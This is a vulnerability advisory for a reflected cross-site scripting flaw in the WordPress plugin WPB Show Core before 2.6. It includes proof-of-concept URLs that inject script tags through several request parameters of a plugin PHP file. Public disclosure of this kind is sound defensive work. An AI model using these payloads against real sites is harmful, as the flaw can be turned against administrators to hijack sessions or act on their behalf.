WordPress Plugin Vulnerabilities
WPB Show Core < 2.6 - Reflected XSS
Description
The plugin does not sanitise and escape some request parameters before outputting them back into the page, leading to a Reflected Cross-Site Scripting vulnerability that could be used against high-privilege users such as administrators.
Proof of Concept
https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(1337)%3C/script%3E
https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E//
https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-18-24%3Cscript%3Ealert(1337)%3C/script%3E&podcastName=Lightning+Thursdays&podCastImage=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podcastSlug=lightning-thursdays&siteurl=https%3A%2F%2Fwww.example.com&fileList%5B0%5D%5Bid%5D=49824&fileList%5B0%5D%5Bmp3%5D=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2024%2F01%2F18105309%2FLightning-TODAY-1-18-24.mp3&fileList%5B0%5D%5Btitle%5D=1-18-241-2%3Cscript%3Ealert(1337)%3C/script%3E&fileList%5B0%5D%5Bactual_mp3%5D=&blogid=874&rss_feed_link=https%3A%2F%2Fwww.example.com%2Fpodcast%2Flightning-thursdays%2Ffeed%2F%3Fpost_type%3Depisode&podImg_URL=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podCastId=78&episodeId=49824&audioPlayerOption=advance&gmf=-5&ckd=www.example.com&embedFlag=podcast
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Aly Khaled Aly Abd Al-aal
Submitter
Aly Khaled Aly Abd Al-aal
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-18
Added
2024-03-18
Last Updated
2024-03-18